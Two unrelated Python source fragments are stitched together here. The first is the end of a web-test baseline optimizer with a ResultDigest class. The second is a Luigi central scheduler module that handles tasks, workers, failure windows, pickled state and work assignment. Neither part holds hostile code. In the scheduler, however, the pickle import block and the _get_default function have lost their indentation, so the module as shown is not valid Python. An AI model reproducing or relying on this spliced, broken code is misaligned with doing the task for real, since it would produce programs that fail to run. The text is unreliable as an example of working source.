            # This happens if we're missing baselines for a port.
            if not current_result:
                continue
            search_path = self._relative_baseline_search_path(port)
            current_index, current_directory = self._find_in_search_path(
                search_path, current_result, new_results_by_directory)
            found_different_result = False
            for index in range(current_index + 1, len(search_path)):
                new_directory = search_path[index]
                if new_directory not in new_results_by_directory:
                    # No baseline in this directory.
                    continue
                elif new_results_by_directory[new_directory] == current_result:
                    # The baseline in current_directory is redundant with the
                    # baseline in new_directory which is later in the search
                    # path. Remove the earlier one and point current to new.
                    if current_directory in new_results_by_directory:
                        del new_results_by_directory[current_directory]
                    current_directory = new_directory
                else:
                    # A different result is found, so stop.
                    found_different_result = True
                    break
            # If we did not find a different fallback and current_result is
            # an extra result, we can safely remove it.
            # Note that we do not remove the generic extra result here.
            # Roots (virtual and non-virtual) are treated specially later.
            if (not found_different_result and current_result.is_extra_result
                    and current_directory != self._baseline_root()
                    and current_directory in new_results_by_directory):
                del new_results_by_directory[current_directory]
        return new_results_by_directory

    def _find_in_search_path(self, search_path, current_result,
                             results_by_directory):
        """Finds the index and the directory of a result on a search path."""
        for index, directory in enumerate(search_path):
            if (directory in results_by_directory
                    and (results_by_directory[directory] == current_result)):
                return index, directory
        assert current_result.is_extra_result, (
            'result %s not found in search path %s, %s' %
            (current_result, search_path, results_by_directory))
        # Implicit extra result at the root.
        return len(search_path) - 1, search_path[-1]

    def _remove_extra_result_at_root(self, test_name, baseline_name):
        """Removes extra result at the non-virtual root."""
        assert not self._virtual_base(baseline_name), \
            'A virtual baseline is passed in.'
        path = self._join_directory(self._baseline_root(), baseline_name)
        if (self._filesystem.exists(path)
                and ResultDigest(self._filesystem, path,
                                 self._is_reftest(test_name)).is_extra_result):
            _log.debug(
                'Deleting extra baseline (empty, -expected.png for reftest, or all-PASS testharness JS result)'
            )
            _log.debug('  Deleting (file system): ' + path)
            self._filesystem.remove(path)
class ResultDigest(object):
    """Digest of a result file for fast comparison.

    A result file can be any actual or expected output from a web test,
    including text and image. SHA1 is used internally to digest the file.

    A baseline is considered an "extra" result when:
      1. it is an all-PASS testharness result,
      2. it is empty, or
      3. the test is a reftest and the baseline is an -expected.png file.
    An extra baseline should be deleted if it doesn't override the fallback
    baseline; we detect that by comparing ResultDigests. When the fallback
    baseline doesn't exist (and the baseline is not the root one), the
    fallback is modelled as an *implicit extra result* that compares equal
    to any extra baseline, so the extra baseline is treated as not
    overriding it and gets removed.
    """

    # Sentinel SHA used for an implicit extra result (no file at all).
    _IMPLICIT_EXTRA_RESULT = '<EXTRA>'

    def __init__(self, fs, path, is_reftest=False):
        """Constructs the digest for a result.

        Args:
            fs: An instance of common.system.FileSystem.
            path: The path to a result file. If None is provided, the result
                is an *implicit* extra result.
            is_reftest: Whether the test is a reftest.
        """
        self.path = path
        if path is None:
            self.sha = self._IMPLICIT_EXTRA_RESULT
            self.is_extra_result = True
            return
        assert fs.exists(path)
        if path.endswith('.txt'):
            # Unfortunately, we may read the file twice: once in text mode to
            # check the content, and once in binary mode for the SHA1.
            text = fs.read_text_file(path)
            self.is_extra_result = (not text
                                    or is_all_pass_testharness_result(text))
            self.sha = fs.sha1(path)
        elif path.endswith('.png') and is_reftest:
            # A reftest's -expected.png is always an extra baseline.
            self.is_extra_result = True
            self.sha = ''
        else:
            self.is_extra_result = not fs.read_binary_file(path)
            self.sha = fs.sha1(path)

    def __eq__(self, other):
        if other is None:
            return False
        # An implicit extra result is equal to any extra result.
        implicit = self._IMPLICIT_EXTRA_RESULT
        if implicit in (self.sha, other.sha):
            return self.is_extra_result and other.is_extra_result
        return self.sha == other.sha

    # Python 2 does not automatically delegate __ne__ to not __eq__.
    def __ne__(self, other):
        return not self.__eq__(other)

    def __str__(self):
        return self.sha[:7]

    def __repr__(self):
        extra_tag = ' EXTRA' if self.is_extra_result else ''
        return '<ResultDigest %s%s %s>' % (self.sha, extra_tag, self.path)
| |
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The system for scheduling tasks and executing them in order.
Deals with dependencies, priorities, resources, etc.
The :py:class:`~luigi.worker.Worker` pulls tasks from the scheduler (usually over the REST interface) and executes them.
See :doc:`/central_scheduler` for more info.
"""
import collections
try:
import cPickle as pickle
except ImportError:
import pickle
import datetime
import functools
import itertools
import logging
import os
import time
from luigi import six
from luigi import configuration
from luigi import notifications
from luigi import parameter
from luigi import task_history as history
from luigi.task_status import DISABLED, DONE, FAILED, PENDING, RUNNING, SUSPENDED, UNKNOWN
from luigi.task import Config
logger = logging.getLogger("luigi.server")
class Scheduler(object):
    """
    Abstract base class.

    Note that the methods all take string arguments, not Task objects...
    """
    # Fixed: the docstring previously ended with five quotes ("""""), which
    # closed the triple-quoted string and concatenated a stray empty literal.
    # Subclasses must provide these entry points.
    add_task = NotImplemented
    get_work = NotImplemented
    ping = NotImplemented
# Labels describing why a pending task cannot run, derived from the statuses
# of its upstream dependencies.
UPSTREAM_RUNNING = 'UPSTREAM_RUNNING'
UPSTREAM_MISSING_INPUT = 'UPSTREAM_MISSING_INPUT'
UPSTREAM_FAILED = 'UPSTREAM_FAILED'
UPSTREAM_DISABLED = 'UPSTREAM_DISABLED'
# Ordered from least to most severe; '' means no upstream problem.
UPSTREAM_SEVERITY_ORDER = (
    '',
    UPSTREAM_RUNNING,
    UPSTREAM_MISSING_INPUT,
    UPSTREAM_FAILED,
    UPSTREAM_DISABLED,
)
# Key function mapping an upstream label to its severity rank (position in
# UPSTREAM_SEVERITY_ORDER), usable with max()/sorted().
UPSTREAM_SEVERITY_KEY = UPSTREAM_SEVERITY_ORDER.index
# Maps a dependency's task status to the upstream label it implies for tasks
# depending on it.
STATUS_TO_UPSTREAM_MAP = {
    FAILED: UPSTREAM_FAILED,
    RUNNING: UPSTREAM_RUNNING,
    PENDING: UPSTREAM_MISSING_INPUT,
    DISABLED: UPSTREAM_DISABLED,
}
class scheduler(Config):
    """Configuration section for the central scheduler."""
    # TODO(erikbern): the config_path is needed for backwards compatibility. We should drop the compatibility
    # at some point (in particular this would force users to replace all dashes with underscores in the config)
    # Seconds before a failed task becomes runnable again.
    retry_delay = parameter.FloatParameter(default=900.0)
    # Seconds before a finished task is removed from scheduler state.
    remove_delay = parameter.FloatParameter(default=600.0)
    # Seconds without contact before a worker is considered disconnected.
    worker_disconnect_delay = parameter.FloatParameter(default=60.0)
    # Where the scheduler persists its pickled state.
    state_path = parameter.Parameter(default='/var/lib/luigi-server/state.pickle')
    # Jobs are disabled if we see more than disable_failures failures in disable_window seconds.
    # These disables last for disable_persist seconds.
    disable_window = parameter.IntParameter(default=3600,
                                            config_path=dict(section='scheduler', name='disable-window-seconds'))
    disable_failures = parameter.IntParameter(default=None,
                                              config_path=dict(section='scheduler', name='disable-num-failures'))
    disable_hard_timeout = parameter.IntParameter(default=None,
                                                  config_path=dict(section='scheduler', name='disable-hard-timeout'))
    disable_persist = parameter.IntParameter(default=86400,
                                             config_path=dict(section='scheduler', name='disable-persist-seconds'))
    # Cap on how many tasks the task-list endpoints will return.
    max_shown_tasks = parameter.IntParameter(default=100000)
    prune_done_tasks = parameter.BoolParameter(default=False)
    record_task_history = parameter.BoolParameter(default=False)
    # Output format of the dependency graph in the visualiser.
    visualization_graph = parameter.Parameter(default="svg", config_path=dict(section='scheduler', name='visualization-graph'))
    prune_on_get_work = parameter.BoolParameter(default=False)
def fix_time(x):
    """Coerce a possibly-datetime value to an epoch timestamp.

    Backwards compatibility for a fix in Dec 2014: prior to the fix, pickled
    state might store datetime objects where epoch floats are expected.
    TODO: remove this function soon.
    """
    if not isinstance(x, datetime.datetime):
        return x
    return time.mktime(x.timetuple())
class Failures(object):
    """
    Tracks failure timestamps within a sliding time window.

    Every failure is stamped with the time it was recorded; num_failures()
    counts only the failures inside the window ending at the present.
    """

    def __init__(self, window):
        """
        Initialize with the given window.

        :param window: how long to track failures for, as a float (number of seconds).
        """
        self.window = window
        self.failures = collections.deque()
        self.first_failure_time = None

    def add_failure(self):
        """
        Record a failure stamped with the current time.
        """
        now = time.time()
        if not self.first_failure_time:
            self.first_failure_time = now
        self.failures.append(now)

    def num_failures(self):
        """
        Return the number of failures inside the window.
        """
        cutoff = time.time() - self.window
        # Drop entries that have aged out of the window; fix_time() converts
        # legacy datetime entries loaded from old pickled state.
        while self.failures and fix_time(self.failures[0]) < cutoff:
            self.failures.popleft()
        return len(self.failures)

    def clear(self):
        """
        Forget all recorded failures.
        """
        self.failures.clear()
def _get_default(x, default):
if x is not None:
return x
else:
return default
class Task(object):
    """Scheduler-side record of a single task instance and its state."""

    def __init__(self, task_id, status, deps, resources=None, priority=0, family='', module=None,
                 params=None, disable_failures=None, disable_window=None, disable_hard_timeout=None):
        self.id = task_id
        # Worker ids somehow related to this task (i.e. don't prune the task
        # while any of these workers are still active).
        self.stakeholders = set()
        # Worker ids that can perform the task - the task is 'BROKEN' if none
        # of these workers are active.
        self.workers = set()
        self.deps = set() if deps is None else set(deps)
        self.status = status  # PENDING, RUNNING, FAILED or DONE
        self.time = time.time()  # Timestamp when task was first added
        self.retry = None
        self.remove = None
        # The worker id that is currently running the task, or None.
        self.worker_running = None
        self.time_running = None  # Timestamp when picked up by worker
        self.expl = None
        self.priority = priority
        self.resources = _get_default(resources, {})
        self.family = family
        self.module = module
        self.params = _get_default(params, {})
        self.disable_failures = disable_failures
        self.disable_hard_timeout = disable_hard_timeout
        self.failures = Failures(disable_window)
        self.scheduler_disable_time = None

    def __repr__(self):
        return "Task(%r)" % vars(self)

    def add_failure(self):
        """Record one failure at the current time."""
        self.failures.add_failure()

    def has_excessive_failures(self):
        """Return True once a disable threshold has been crossed."""
        first_failure = self.failures.first_failure_time
        hard_timeout_hit = bool(
            first_failure is not None and self.disable_hard_timeout and
            time.time() >= first_failure + self.disable_hard_timeout)
        # num_failures() also prunes failures that fell out of the window.
        too_many_failures = (
            self.failures.num_failures() >= self.disable_failures)
        return hard_timeout_hit or too_many_failures

    def can_disable(self):
        """Whether any disable threshold is configured for this task."""
        has_failure_limit = self.disable_failures is not None
        has_hard_timeout = self.disable_hard_timeout is not None
        return has_failure_limit or has_hard_timeout
class Worker(object):
    """
    Bookkeeping for one connected worker: identity, liveness and its tasks.
    """
    def __init__(self, worker_id, last_active=None):
        self.id = worker_id
        self.reference = None  # reference to the worker in the real world. (Currently a dict containing just the host)
        self.last_active = last_active or time.time()  # seconds since epoch
        self.started = time.time()  # seconds since epoch
        self.tasks = set()  # task objects
        self.info = {}
    def add_info(self, info):
        """Merge *info* into this worker's metadata dict."""
        self.info.update(info)
    def update(self, worker_reference):
        """Refresh the liveness timestamp and, if given, the worker reference."""
        if worker_reference:
            self.reference = worker_reference
        self.last_active = time.time()
    def prune(self, config):
        """Return True when the worker has been silent past the disconnect delay."""
        # Delete workers that haven't said anything for a while (probably killed)
        if time.time() > self.last_active + config.worker_disconnect_delay:
            return True
    def get_pending_tasks(self, state):
        """
        Get PENDING (and RUNNING) tasks for this worker.
        You have to pass in the state for optimization reasons.
        """
        if len(self.tasks) >= state.num_pending_tasks():
            return state.get_pending_tasks()
        return six.moves.filter(lambda task: task.status in [PENDING, RUNNING],
                                self.tasks)
    def is_trivial_worker(self, state):
        """
        True for a non-assistant whose pending tasks all declare no resources.
        We have to pass the state parameter for optimization reasons.
        """
        if self.assistant:
            return False
        pending = self.get_pending_tasks(state)
        return all(not task.resources for task in pending)
    @property
    def assistant(self):
        return self.info.get('assistant', False)
    def __str__(self):
        return self.id
class SimpleTaskState(object):
    """
    Keep track of the current scheduler state and handle persistence.

    The point of this class is to enable other ways to keep state, e.g. by
    using a database. These will be implemented by creating an abstract base
    class that this and other classes inherit from.
    """
    def __init__(self, state_path):
        # state_path: filesystem path used to pickle/unpickle the state.
        self._state_path = state_path
        self._tasks = {}  # map from id to a Task object
        self._status_tasks = collections.defaultdict(dict)  # status -> {task_id: Task}; kept in sync with _tasks
        self._active_workers = {}  # map from id to a Worker object
    def dump(self):
        """Pickle (tasks, workers) to the state path; IOError is logged, not raised."""
        state = (self._tasks, self._active_workers)
        try:
            with open(self._state_path, 'wb') as fobj:
                pickle.dump(state, fobj)
        except IOError:
            logger.warning("Failed saving scheduler state", exc_info=1)
        else:
            logger.info("Saved state in %s", self._state_path)
    # prone to lead to crashes when old state is unpickled with updated code. TODO some kind of version control?
    def load(self):
        """Restore state from disk, converting legacy on-disk formats where needed."""
        if os.path.exists(self._state_path):
            logger.info("Attempting to load state from %s", self._state_path)
            try:
                with open(self._state_path, 'rb') as fobj:
                    state = pickle.load(fobj)
            except BaseException:
                # Any unpickling problem (version skew, corruption, ...) means
                # we start over rather than crash the scheduler.
                logger.exception("Error when loading state. Starting from clean slate.")
                return
            self._tasks, self._active_workers = state
            # Rebuild the by-status index from scratch; it is derived data.
            self._status_tasks = collections.defaultdict(dict)
            for task in six.itervalues(self._tasks):
                self._status_tasks[task.status][task.id] = task
            # Convert from old format
            # TODO: this is really ugly, we need something more future-proof
            # Every time we add an attribute to the Worker class, this code needs to be updated
            for k, v in six.iteritems(self._active_workers):
                if isinstance(v, float):
                    # very old format stored just the last_active timestamp
                    self._active_workers[k] = Worker(worker_id=k, last_active=v)
            if any(not hasattr(w, 'tasks') for k, w in six.iteritems(self._active_workers)):
                # If you load from an old format where Workers don't contain tasks.
                for k, worker in six.iteritems(self._active_workers):
                    worker.tasks = set()
                for task in six.itervalues(self._tasks):
                    for worker_id in task.workers:
                        self._active_workers[worker_id].tasks.add(task)
        else:
            logger.info("No prior state file exists at %s. Starting with clean slate", self._state_path)
    def get_active_tasks(self, status=None):
        """Yield all tasks, or only the tasks with the given status."""
        if status:
            for task in six.itervalues(self._status_tasks[status]):
                yield task
        else:
            for task in six.itervalues(self._tasks):
                yield task
    def get_running_tasks(self):
        """Iterate over tasks whose status is RUNNING."""
        return six.itervalues(self._status_tasks[RUNNING])
    def get_pending_tasks(self):
        """Iterate over tasks that are PENDING or RUNNING."""
        return itertools.chain.from_iterable(six.itervalues(self._status_tasks[status])
                                             for status in [PENDING, RUNNING])
    def num_pending_tasks(self):
        """
        Return how many tasks are PENDING + RUNNING. O(1).
        """
        return len(self._status_tasks[PENDING]) + len(self._status_tasks[RUNNING])
    def get_task(self, task_id, default=None, setdefault=None):
        # With setdefault given, behaves like dict.setdefault and also indexes
        # the (possibly newly inserted) task under its status.
        if setdefault:
            task = self._tasks.setdefault(task_id, setdefault)
            self._status_tasks[task.status][task.id] = task
            return task
        else:
            return self._tasks.get(task_id, default)
    def has_task(self, task_id):
        return task_id in self._tasks
    def re_enable(self, task, config=None):
        """Clear a task's disabled state; with a config, also reset it to FAILED."""
        task.scheduler_disable_time = None
        task.failures.clear()
        if config:
            self.set_status(task, FAILED, config)
            # set_status may record a new failure; wipe it again
            task.failures.clear()
    def set_status(self, task, new_status, config=None):
        """
        Move *task* to *new_status*, enforcing the status state machine and the
        auto-disable policy. ``config`` is required when new_status is FAILED.
        """
        if new_status == FAILED:
            assert config is not None
        # not sure why we have SUSPENDED, as it can never be set
        if new_status == SUSPENDED:
            new_status = PENDING
        if new_status == DISABLED and task.status == RUNNING:
            return
        if task.status == DISABLED:
            if new_status == DONE:
                self.re_enable(task)
            # don't allow workers to override a scheduler disable
            elif task.scheduler_disable_time is not None:
                return
        if new_status == FAILED and task.can_disable():
            task.add_failure()
            if task.has_excessive_failures():
                task.scheduler_disable_time = time.time()
                new_status = DISABLED
                notifications.send_error_email(
                    'Luigi Scheduler: DISABLED {task} due to excessive failures'.format(task=task.id),
                    '{task} failed {failures} times in the last {window} seconds, so it is being '
                    'disabled for {persist} seconds'.format(
                        failures=config.disable_failures,
                        task=task.id,
                        window=config.disable_window,
                        persist=config.disable_persist,
                    ))
        elif new_status == DISABLED:
            # an explicit (worker-requested) disable carries no expiry time
            task.scheduler_disable_time = None
        # Keep the by-status index consistent with the task's status field.
        self._status_tasks[task.status].pop(task.id)
        self._status_tasks[new_status][task.id] = task
        task.status = new_status
    def prune(self, task, config, assistants):
        """
        Apply retention/retry policies to one task.
        Returns True when the task should be removed from the state.
        """
        remove = False
        # Mark tasks with no remaining active stakeholders for deletion
        if not task.stakeholders:
            if task.remove is None:
                logger.info("Task %r has stakeholders %r but none remain connected -> will remove "
                            "task in %s seconds", task.id, task.stakeholders, config.remove_delay)
                task.remove = time.time() + config.remove_delay
        # If a running worker disconnects, tag all its jobs as FAILED and subject it to the same retry logic
        if task.status == RUNNING and task.worker_running and task.worker_running not in task.stakeholders | assistants:
            logger.info("Task %r is marked as running by disconnected worker %r -> marking as "
                        "FAILED with retry delay of %rs", task.id, task.worker_running,
                        config.retry_delay)
            task.worker_running = None
            self.set_status(task, FAILED, config)
            task.retry = time.time() + config.retry_delay
        # Re-enable task after the disable time expires
        if task.status == DISABLED and task.scheduler_disable_time:
            if time.time() - fix_time(task.scheduler_disable_time) > config.disable_persist:
                self.re_enable(task, config)
        # Remove tasks that have no stakeholders
        if task.remove and time.time() > task.remove:
            logger.info("Removing task %r (no connected stakeholders)", task.id)
            remove = True
        # Reset FAILED tasks to PENDING if max timeout is reached, and retry delay is >= 0
        if task.status == FAILED and config.retry_delay >= 0 and task.retry < time.time():
            self.set_status(task, PENDING, config)
        return remove
    def inactivate_tasks(self, delete_tasks):
        # The terminology is a bit confusing: we used to "delete" tasks when they became inactive,
        # but with a pluggable state storage, you might very well want to keep some history of
        # older tasks as well. That's why we call it "inactivate" (as in the verb)
        for task in delete_tasks:
            task_obj = self._tasks.pop(task)
            self._status_tasks[task_obj.status].pop(task)
    def get_active_workers(self, last_active_lt=None):
        """Yield workers, optionally only those last active before *last_active_lt*."""
        for worker in six.itervalues(self._active_workers):
            if last_active_lt is not None and worker.last_active >= last_active_lt:
                continue
            yield worker
    def get_assistants(self, last_active_lt=None):
        """Yield active workers that registered themselves as assistants."""
        return filter(lambda w: w.assistant, self.get_active_workers(last_active_lt))
    def get_worker_ids(self):
        return self._active_workers.keys()  # only used for unit tests
    def get_worker(self, worker_id):
        """Return the Worker for *worker_id*, creating a fresh one if unknown."""
        return self._active_workers.setdefault(worker_id, Worker(worker_id))
    def inactivate_workers(self, delete_workers):
        # Mark workers as inactive
        for worker in delete_workers:
            self._active_workers.pop(worker)
        # remove workers from tasks
        for task in self.get_active_tasks():
            task.stakeholders.difference_update(delete_workers)
            task.workers.difference_update(delete_workers)
    def get_necessary_tasks(self):
        """Return the ids of tasks (and their deps) that must be kept around for assistants."""
        necessary_tasks = set()
        for task in self.get_active_tasks():
            if task.status not in (DONE, DISABLED) or \
                    getattr(task, 'scheduler_disable_time', None) is not None:
                necessary_tasks.update(task.deps)
                necessary_tasks.add(task.id)
        return necessary_tasks
class CentralPlannerScheduler(Scheduler):
    """
    Async scheduler that can handle multiple workers, etc.
    Can be run locally or on a server (using RemoteScheduler + server.Server).
    """
    def __init__(self, config=None, resources=None, task_history_impl=None, **kwargs):
        """
        Keyword Arguments:
        :param config: an object of class "scheduler" or None (in which the global instance will be used)
        :param resources: a dict of str->int constraints
        :param task_history_impl: ignore config and use this object as the task history
        """
        self._config = config or scheduler(**kwargs)
        self._state = SimpleTaskState(self._config.state_path)
        if task_history_impl:
            self._task_history = task_history_impl
        elif self._config.record_task_history:
            from luigi import db_task_history  # Needs sqlalchemy, thus imported here
            self._task_history = db_task_history.DbTaskHistory()
        else:
            self._task_history = history.NopHistory()
        self._resources = resources or configuration.get_config().getintdict('resources')  # TODO: Can we make this a Parameter?
        # Factory that bakes the configured auto-disable policy into every new Task.
        self._make_task = functools.partial(
            Task, disable_failures=self._config.disable_failures,
            disable_hard_timeout=self._config.disable_hard_timeout,
            disable_window=self._config.disable_window)
    def load(self):
        self._state.load()
    def dump(self):
        self._state.dump()
    def prune(self):
        """Drop timed-out workers, then prune/retire tasks no longer needed."""
        logger.info("Starting pruning of task graph")
        remove_workers = []
        for worker in self._state.get_active_workers():
            if worker.prune(self._config):
                logger.info("Worker %s timed out (no contact for >=%ss)", worker, self._config.worker_disconnect_delay)
                remove_workers.append(worker.id)
        self._state.inactivate_workers(remove_workers)
        assistant_ids = set(w.id for w in self._state.get_assistants())
        remove_tasks = []
        if assistant_ids:
            # Assistants may pick up anything, so keep tasks they might still need.
            necessary_tasks = self._state.get_necessary_tasks()
        else:
            necessary_tasks = ()
        for task in self._state.get_active_tasks():
            if task.id not in necessary_tasks and self._state.prune(task, self._config, assistant_ids):
                remove_tasks.append(task.id)
        self._state.inactivate_tasks(remove_tasks)
        logger.info("Done pruning task graph")
    def update(self, worker_id, worker_reference=None):
        """
        Keep track of whenever the worker was last active.
        """
        worker = self._state.get_worker(worker_id)
        worker.update(worker_reference)
    def _update_priority(self, task, prio, worker):
        """
        Update priority of the given task.
        Priority can only be increased.
        If the task doesn't exist, a placeholder task is created to preserve priority when the task is later scheduled.
        """
        task.priority = prio = max(prio, task.priority)
        for dep in task.deps or []:
            t = self._state.get_task(dep)
            if t is not None and prio > t.priority:
                self._update_priority(t, prio, worker)
    def add_task(self, task_id=None, status=PENDING, runnable=True,
                 deps=None, new_deps=None, expl=None, resources=None,
                 priority=0, family='', module=None, params=None,
                 assistant=False, **kwargs):
        """
        * add task identified by task_id if it doesn't exist
        * if deps is not None, update dependency list
        * update status of task
        * add additional workers/stakeholders
        * update priority when needed
        """
        worker_id = kwargs['worker']
        self.update(worker_id)
        task = self._state.get_task(task_id, setdefault=self._make_task(
            task_id=task_id, status=PENDING, deps=deps, resources=resources,
            priority=priority, family=family, module=module, params=params))
        # for setting priority, we'll sometimes create tasks with unset family and params
        if not task.family:
            task.family = family
        if not getattr(task, 'module', None):
            task.module = module
        if not task.params:
            task.params = _get_default(params, {})
        if task.remove is not None:
            task.remove = None  # unmark task for removal so it isn't removed after being added
        if not (task.status == RUNNING and status == PENDING):
            # don't allow re-scheduling of task while it is running, it must either fail or succeed first
            if status == PENDING or status != task.status:
                # Update the DB only if there was an actual change, to prevent noise.
                # We also check for status == PENDING b/c that's the default value
                # (so checking for status != task.status would lie)
                self._update_task_history(task_id, status)
            self._state.set_status(task, PENDING if status == SUSPENDED else status, self._config)
            if status == FAILED:
                task.retry = time.time() + self._config.retry_delay
        if deps is not None:
            task.deps = set(deps)
        if new_deps is not None:
            task.deps.update(new_deps)
        if resources is not None:
            task.resources = resources
        if not assistant:
            task.stakeholders.add(worker_id)
            # Task dependencies might not exist yet. Let's create dummy tasks for them for now.
            # Otherwise the task dependencies might end up being pruned if scheduling takes a long time
            for dep in task.deps or []:
                t = self._state.get_task(dep, setdefault=self._make_task(task_id=dep, status=UNKNOWN, deps=None, priority=priority))
                t.stakeholders.add(worker_id)
        self._update_priority(task, priority, worker_id)
        if runnable:
            task.workers.add(worker_id)
            self._state.get_worker(worker_id).tasks.add(task)
        if expl is not None:
            task.expl = expl
    def add_worker(self, worker, info, **kwargs):
        # info may be a dict or a sequence of key/value pairs (dict.update accepts both)
        self._state.get_worker(worker).add_info(info)
    def update_resources(self, **resources):
        if self._resources is None:
            self._resources = {}
        self._resources.update(resources)
    def _has_resources(self, needed_resources, used_resources):
        # True when every needed resource fits within (available - used).
        # Resources not declared in the config default to a capacity of 1.
        if needed_resources is None:
            return True
        available_resources = self._resources or {}
        for resource, amount in six.iteritems(needed_resources):
            if amount + used_resources[resource] > available_resources.get(resource, 1):
                return False
        return True
    def _used_resources(self):
        # Sum resource usage over all currently RUNNING tasks.
        used_resources = collections.defaultdict(int)
        if self._resources is not None:
            for task in self._state.get_active_tasks():
                if task.status == RUNNING and task.resources:
                    for resource, amount in six.iteritems(task.resources):
                        used_resources[resource] += amount
        return used_resources
    def _rank(self, among_tasks):
        """
        Return worker's rank function for task scheduling.

        Sort key: (priority, weighted number of not-done dependents, age).
        :return: a key function usable with ``list.sort``.
        """
        dependents = collections.defaultdict(int)
        def not_done(t):
            task = self._state.get_task(t, default=None)
            return task is None or task.status != DONE
        for task in among_tasks:
            if task.status != DONE:
                deps = list(filter(not_done, task.deps))
                # each task spreads one unit of weight over its unfinished deps
                inverse_num_deps = 1.0 / max(len(deps), 1)
                for dep in deps:
                    dependents[dep] += inverse_num_deps
        return lambda task: (task.priority, dependents[task.id], -task.time)
    def _schedulable(self, task):
        # A task may be handed out iff it is PENDING and all its deps are DONE.
        if task.status != PENDING:
            return False
        for dep in task.deps:
            dep_task = self._state.get_task(dep, default=None)
            if dep_task is None or dep_task.status != DONE:
                return False
        return True
    def get_work(self, host=None, assistant=False, **kwargs):
        # TODO: remove any expired nodes
        # Algo: iterate over all nodes, find the highest priority node no dependencies and available
        # resources.
        # Resource checking looks both at currently available resources and at which resources would
        # be available if all running tasks died and we rescheduled all workers greedily. We do both
        # checks in order to prevent a worker with many low-priority tasks from starving other
        # workers with higher priority tasks that share the same resources.
        # TODO: remove tasks that can't be done, figure out if the worker has absolutely
        # nothing it can wait for
        if self._config.prune_on_get_work:
            self.prune()
        worker_id = kwargs['worker']
        # Return remaining tasks that have no FAILED descendants
        self.update(worker_id, {'host': host})
        if assistant:
            self.add_worker(worker_id, [('assistant', assistant)])
        best_task = None
        locally_pending_tasks = 0
        running_tasks = []
        upstream_table = {}
        greedy_resources = collections.defaultdict(int)
        n_unique_pending = 0
        worker = self._state.get_worker(worker_id)
        if worker.is_trivial_worker(self._state):
            # cheap path: no resources involved, only this worker's own tasks matter
            relevant_tasks = worker.get_pending_tasks(self._state)
            used_resources = collections.defaultdict(int)
            greedy_workers = dict()  # If there's no resources, then they can grab any task
        else:
            relevant_tasks = self._state.get_pending_tasks()
            used_resources = self._used_resources()
            greedy_workers = dict((worker.id, worker.info.get('workers', 1))
                                  for worker in self._state.get_active_workers())
        tasks = list(relevant_tasks)
        tasks.sort(key=self._rank(among_tasks=tasks), reverse=True)
        for task in tasks:
            upstream_status = self._upstream_status(task.id, upstream_table)
            in_workers = (assistant and task.workers) or worker_id in task.workers
            if task.status == RUNNING and in_workers:
                # Return a list of currently running tasks to the client,
                # makes it easier to troubleshoot
                other_worker = self._state.get_worker(task.worker_running)
                more_info = {'task_id': task.id, 'worker': str(other_worker)}
                if other_worker is not None:
                    more_info.update(other_worker.info)
                    running_tasks.append(more_info)
            if task.status == PENDING and in_workers and upstream_status != UPSTREAM_DISABLED:
                locally_pending_tasks += 1
                if len(task.workers) == 1 and not assistant:
                    n_unique_pending += 1
            if task.status == RUNNING and (task.worker_running in greedy_workers):
                # account for the slot and resources this running task occupies
                greedy_workers[task.worker_running] -= 1
                for resource, amount in six.iteritems((task.resources or {})):
                    greedy_resources[resource] += amount
            if not best_task and self._schedulable(task) and self._has_resources(task.resources, greedy_resources):
                if in_workers and self._has_resources(task.resources, used_resources):
                    best_task = task
                else:
                    # greedily reserve a slot + resources for whichever worker
                    # would take this higher-priority task, so we don't starve it
                    workers = itertools.chain(task.workers, [worker_id]) if assistant else task.workers
                    for task_worker in workers:
                        if greedy_workers.get(task_worker, 0) > 0:
                            # use up a worker
                            greedy_workers[task_worker] -= 1
                            # keep track of the resources used in greedy scheduling
                            for resource, amount in six.iteritems((task.resources or {})):
                                greedy_resources[resource] += amount
                            break
        reply = {'n_pending_tasks': locally_pending_tasks,
                 'running_tasks': running_tasks,
                 'task_id': None,
                 'n_unique_pending': n_unique_pending}
        if best_task:
            self._state.set_status(best_task, RUNNING, self._config)
            best_task.worker_running = worker_id
            best_task.time_running = time.time()
            self._update_task_history(best_task.id, RUNNING, host=host)
            reply['task_id'] = best_task.id
            reply['task_family'] = best_task.family
            reply['task_module'] = getattr(best_task, 'module', None)
            reply['task_params'] = best_task.params
        return reply
    def ping(self, **kwargs):
        worker_id = kwargs['worker']
        self.update(worker_id)
    def _upstream_status(self, task_id, upstream_status_table):
        # Compute (and memoize into upstream_status_table) the upstream status
        # of a task by walking its dependency graph with an explicit stack.
        if task_id in upstream_status_table:
            return upstream_status_table[task_id]
        elif self._state.has_task(task_id):
            task_stack = [task_id]
            while task_stack:
                dep_id = task_stack.pop()
                if self._state.has_task(dep_id):
                    dep = self._state.get_task(dep_id)
                    if dep_id not in upstream_status_table:
                        if dep.status == PENDING and dep.deps:
                            # revisit this node after its deps (postorder)
                            task_stack = task_stack + [dep_id] + list(dep.deps)
                            upstream_status_table[dep_id] = ''  # will be updated postorder
                        else:
                            dep_status = STATUS_TO_UPSTREAM_MAP.get(dep.status, '')
                            upstream_status_table[dep_id] = dep_status
                    elif upstream_status_table[dep_id] == '' and dep.deps:
                        # This is the postorder update step when we set the
                        # status based on the previously calculated child elements
                        upstream_status = [upstream_status_table.get(task_id, '') for task_id in dep.deps]
                        upstream_status.append('')  # to handle empty list
                        status = max(upstream_status, key=UPSTREAM_SEVERITY_KEY)
                        upstream_status_table[dep_id] = status
            return upstream_status_table[dep_id]
    def _serialize_task(self, task_id, include_deps=True):
        """Return a JSON-friendly dict describing the task."""
        task = self._state.get_task(task_id)
        ret = {
            'status': task.status,
            'workers': list(task.workers),
            'worker_running': task.worker_running,
            'time_running': getattr(task, "time_running", None),
            'start_time': task.time,
            'params': task.params,
            'name': task.family,
            'priority': task.priority,
            'resources': task.resources,
        }
        if task.status == DISABLED:
            ret['re_enable_able'] = task.scheduler_disable_time is not None
        if include_deps:
            ret['deps'] = list(task.deps)
        return ret
    def graph(self, **kwargs):
        """Serialize every active task (used by the visualizer)."""
        self.prune()
        serialized = {}
        for task in self._state.get_active_tasks():
            serialized[task.id] = self._serialize_task(task.id)
        return serialized
